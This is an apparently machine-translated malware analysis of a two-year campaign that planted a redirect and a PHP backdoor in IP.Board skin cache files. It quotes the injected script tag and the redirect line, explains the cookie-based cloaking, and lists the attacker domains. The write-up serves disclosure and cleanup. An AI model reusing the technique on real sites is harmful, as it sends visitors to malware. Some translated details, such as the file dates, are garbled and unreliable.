Analysis of malicious IP. Board CMS redirection

Analysis of malicious IP. Board CMS redirection

IP. Board CMS is a famous CMS system that allows users to easily create and manage online communities. Sucuri researchers recently discovered a redirection for IP. Board. After analysis, the researchers found that the attack lasted for two years.

Malicious visitor redirection

The redirection symptoms are very typical. Some visitors who search by Google will be redirected to a malicious Website: filestore321. com/download. php? Id = hexnumber. Each visitor will only be redirected once, and clicking again will not be redirected.

After capturing the HTTP traffic, we found that the webpage was directed to "hxxp: // forum. hackedsite. com/index. php? Ipbv = 4458734cb50e424ba7dd3a154b22ecd9 & g = js "load the script. The script content is as follows:

Document. location = 'hxxp: // filestore321. com/download. php? Id = 8-digit-hex-number'

Working Principle

So how does redirection run through IP. Board? Since we are not familiar with IP. Board as WordPress, it is a waste of time to find the source. We have referenced an article by Peter Upfold two years ago. In this article, we found the working principle of redirection, and found that this method appeared two years ago, and there was no major change.

You do not need to access Peter Upfold's article. I will explain how malware works and how it works.

IP. the skin used by the Board is stored in the database and hard disk (stored as files) at the same time. If there is cache, it will be stored in. under/cache/skin_cache/cacheid_n, n indicates the number of skin. The infected skin file we found is the skin_global.php file under./cache/skin_cache/cacheid_4.

The highlighted lines are the malicious code we found in the 120kb skin file.

The variable names in these three encrypted lines use $ rsa, $ ka, and $ pkb, which makes people mistakenly think of the security key.

We restored the obfuscated code, as shown in

First, it checks whether the visitor source is from a search engine or a social network link and confirms that it is not a crawler. If this is a visitor's first visit (without lang_idcookie), it will inject a script into the webpage:

 
 

  
  
<script type=&#039;text/javascript&#039; src=&#039;hxxp://hackedsite .com/index.php?ipbv=<some-hash>&g=js&#039;> 
 
 

When the victim requests this script, it checks whether the visitor has loaded the script for the first time, sets the lang_id cookie to 10 hours, and finally returns the redirection code.

Interestingly, this code does not count browser preread requests as real access, and lang_id cookies are not set when the request has the HTTP_X_MOZ header.

This code is also stored in the prefix_skin_cache table in the IP. Board database. Removing malicious code from files and databases eliminates the risk.

Backdoor

In addition to redirection, this malicious code also contains a backdoor through which attackers can create POST requests to execute PHP code.

Each skin file has the following annotations:

/*--------------------------------------------------*//* FILE GENERATED BY INVISION POWER BOARD 3 *//* CACHE FILE: Skin set id: 4 *//* CACHE FILE: Generated: Fri, 19 Dec 2014 10:28:00 GMT *//* DO NOT EDIT DIRECTLY - THE CHANGES WILL NOT BE *//* WRITTEN TO THE DATABASE AUTOMATICALLY *//*--------------------------------------------------*/

This comment indicates the time when the file was generated. All skin cache files on the servers I found were generated on July 15, December 19, 2014, except that the infected skin_global.php was generated on July 15, January 11, 2015. However, skin_global.php was modified on July 15, December 19, 2014, the same as other files.

I think attackers inject malicious code (possibly by hacking or exploiting a vulnerability) into the standard interface of IP. Board ). The attacker updates the skin cache file. However, to prevent the website administrator from checking recently modified files, the attacker uses the backdoor in the skin to forge the modification time of these infected files.

Domain Name

The attack against IP. Board has been in progress for at least two years. The main difference is that 2015 uses the filestore321. com domain name, and 2013 uses url4short. info.

The IP addresses of both domain names are 66.199.231.59 (Access Integrated Technologies, Inc., USA ).

There are some similar domain names on this IP address. All domain names are used for malicious activities.

filestore321 .com - Created on 2011-01-27 - Expires on 2016-01-27 - Updated on 2015-01-05url4short .info. - Created on 2011-01-27 - Expires on 2016-01-27 - Updated on 2015-01-05file2store.info - Created on 2010-02-17 - Expires on 2015-02-17 - Updated on 2014-01-03filestore123.info - Created on 2011-01-07 - Expires on 2016-01-07 - Updated on 2014-10-10myfilestore.com - Created on 2010-02-03 - Expires on 2016-02-03 - Updated on 2015-01-05filestore72.info - Created on 2010-10-14 - Expires on 2015-10-14 - Updated on 2014-10-10

Some websites will be redirected to a URL similar to the following:

Hxxp: // oognyd96wcqbh6nmzdf0erj. ekabil. com/index. php? G = Signature =

Reference Source: http://blog.sucuri.net/2015/02/analyzing-malicious-redirects-in-the-ip-board-cms.html